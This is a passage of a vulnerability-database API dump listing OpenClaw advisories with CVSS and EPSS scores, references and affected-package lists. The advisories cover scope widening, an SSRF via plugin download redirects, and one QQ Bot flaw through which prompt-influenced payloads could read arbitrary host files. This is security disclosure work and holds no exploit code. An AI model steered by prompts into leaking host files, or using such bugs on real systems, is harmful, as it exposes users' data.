"scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T19:04:48Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/d7c3210cd6f5fdfdc1beff4c9541673e814354d5" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-vc32-h5mq-453v", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "4.8", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T19:04:48Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-vc32-h5mq-453v" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41910", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" }, { "value": "4.8", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41910" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-missing-owner-only-enforcement-in-allowlist-cross-channel-writes", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" }, { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "4.8", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T19:04:48Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-missing-owner-only-enforcement-in-allowlist-cross-channel-writes" }, { "reference_url": "https://github.com/advisories/GHSA-vc32-h5mq-453v", "reference_id": "GHSA-vc32-h5mq-453v", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-vc32-h5mq-453v" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109872?format=api", "purl": "pkg:npm/openclaw@2026.4.8", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2g7x-vu14-nkde" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dqb2-dej7-augt" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-h9a4-1twb-d7d1" }, { "vulnerability": "VCID-hy24-6xpe-pkb7" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-pj41-sunw-vbcj" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w2yd-uw91-9yck" }, { "vulnerability": "VCID-wyat-1259-2kg9" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.8" } ], "aliases": [ "CVE-2026-41910", "GHSA-vc32-h5mq-453v" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-nw4r-wjgs-8qc1" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89820?format=api", "vulnerability_id": "VCID-p7gx-9usz-yyew", "summary": "OpenClaw: Gateway plugin HTTP `auth: gateway` widens identity-bearing `operator.read` requests into runtime `operator.write`\n## Impact\n\nGateway plugin HTTP `auth: gateway` widens identity-bearing `operator.read` requests into runtime `operator.write`.\n\nPlugin HTTP routes using gateway auth could receive runtime write scopes even when the upstream trusted-proxy request only declared read.\n\nOpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `2026.1.29`\n- Patched versions: `2026.4.8`\n\n## Fix\n\nThe issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`.\n\n## Verification\n\nThe fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary.\n\n## Credits\n\nThanks @smaeljaish771 for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42429", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00065", "scoring_system": "epss", "scoring_elements": "0.20475", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00065", "scoring_system": "epss", "scoring_elements": "0.20424", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00065", "scoring_system": "epss", "scoring_elements": "0.20463", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42429" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "2.0", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-4f8g-77mw-3rxc", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N" }, { "value": "LOW", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "2.0", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T13:09:14Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-4f8g-77mw-3rxc" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42429", "reference_id": "CVE-2026-42429", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42429" }, { "reference_url": "https://github.com/advisories/GHSA-4f8g-77mw-3rxc", "reference_id": "GHSA-4f8g-77mw-3rxc", "reference_type": "", "scores": [ { "value": "LOW", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-4f8g-77mw-3rxc" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-privilege-escalation-via-gateway-plugin-http-authentication", "reference_id": "openclaw-privilege-escalation-via-gateway-plugin-http-authentication", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N" }, { "value": "6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T13:09:14Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-privilege-escalation-via-gateway-plugin-http-authentication" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109872?format=api", "purl": "pkg:npm/openclaw@2026.4.8", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2g7x-vu14-nkde" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dqb2-dej7-augt" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-h9a4-1twb-d7d1" }, { "vulnerability": "VCID-hy24-6xpe-pkb7" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-pj41-sunw-vbcj" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w2yd-uw91-9yck" }, { "vulnerability": "VCID-wyat-1259-2kg9" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.8" } ], "aliases": [ "CVE-2026-42429", "GHSA-4f8g-77mw-3rxc" ], "risk_score": 3.2, "exploitability": "0.5", "weighted_severity": "6.4", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-p7gx-9usz-yyew" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89521?format=api", "vulnerability_id": "VCID-p7me-4bzz-83cm", "summary": "OpenClaw: Marketplace Plugin Download Follows Redirects Without SSRF Protection\n## Summary\nMarketplace Plugin Download Follows Redirects Without SSRF Protection\n\n## Current Maintainer Triage\n- Status: open\n- Normalized severity: medium\n- Assessment: v2026.3.28 still uses bare redirect-following fetch in src/plugins/marketplace.ts for marketplace archives, and fixed-on-main only does not change that shipped SSRF exposure.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `2ce44ca6a1302b166a128abbd78f72114f2f4f52` — 2026-03-31T12:59:42+01:00\n\n## Release Process Note\n- The fix is already present in released version `2026.3.31`.\n- This draft looks ready for final maintainer disposition or publication, not additional code-fix work.\n\nThanks @AntAISecurityLab for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41297", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00043", "scoring_system": "epss", "scoring_elements": "0.13336", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00043", "scoring_system": "epss", "scoring_elements": "0.13378", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00043", "scoring_system": "epss", "scoring_elements": "0.13373", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41297" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/2ce44ca6a1302b166a128abbd78f72114f2f4f52", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N" }, { "value": "4.8", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:N/VI:L/VA:N/SC:H/SI:L/SA:N" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-21T13:41:27Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/2ce44ca6a1302b166a128abbd78f72114f2f4f52" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-vjx8-8p7h-82gr", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "4.8", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:N/VI:L/VA:N/SC:H/SI:L/SA:N" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-21T13:41:27Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-vjx8-8p7h-82gr" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41297", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41297" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-server-side-request-forgery-via-marketplace-plugin-download-redirect", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N" }, { "value": "4.8", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:N/VI:L/VA:N/SC:H/SI:L/SA:N" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-21T13:41:27Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-server-side-request-forgery-via-marketplace-plugin-download-redirect" }, { "reference_url": "https://github.com/advisories/GHSA-vjx8-8p7h-82gr", "reference_id": "GHSA-vjx8-8p7h-82gr", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-vjx8-8p7h-82gr" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109907?format=api", "purl": "pkg:npm/openclaw@2026.3.31", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-pj41-sunw-vbcj" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31" } ], "aliases": [ "CVE-2026-41297", "GHSA-vjx8-8p7h-82gr" ], "risk_score": 3.4, "exploitability": "0.5", "weighted_severity": "6.8", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-p7me-4bzz-83cm" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89847?format=api", "vulnerability_id": "VCID-p7v5-jqhq-nbhz", "summary": "OpenClaw: QQ Bot structured payloads could read arbitrary local files\n## Summary\n\nBefore OpenClaw 2026.4.2, QQ Bot structured media payloads could read local files from attacker-chosen paths. A crafted structured payload could escape QQ Bot-owned media roots and cause arbitrary file reads on the host.\n\n## Impact\n\nPrompt-influenced structured payload output could exfiltrate any host file readable by the OpenClaw process through the QQ Bot media-send path. This was a real confidentiality bug on the host filesystem boundary.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.4.1`\n- Patched versions: `>= 2026.4.2`\n- Latest published npm version: `2026.4.1`\n\n## Fix Commit(s)\n\n- `2c45b06afdd6f7c621038b5419d8e661cff34a7f` — restrict QQ Bot structured payload local paths\n\n## Release Process Note\n\nThe fix is present on `main` and is staged for OpenClaw `2026.4.2`. Publish this advisory after the `2026.4.2` npm release is live.\n\nThanks @feiyang666 of Tencent zhuque Lab (https://github.com/Tencent/AI-Infra-Guard) for reporting.", "references": [ { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/2c45b06afdd6f7c621038b5419d8e661cff34a7f", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": 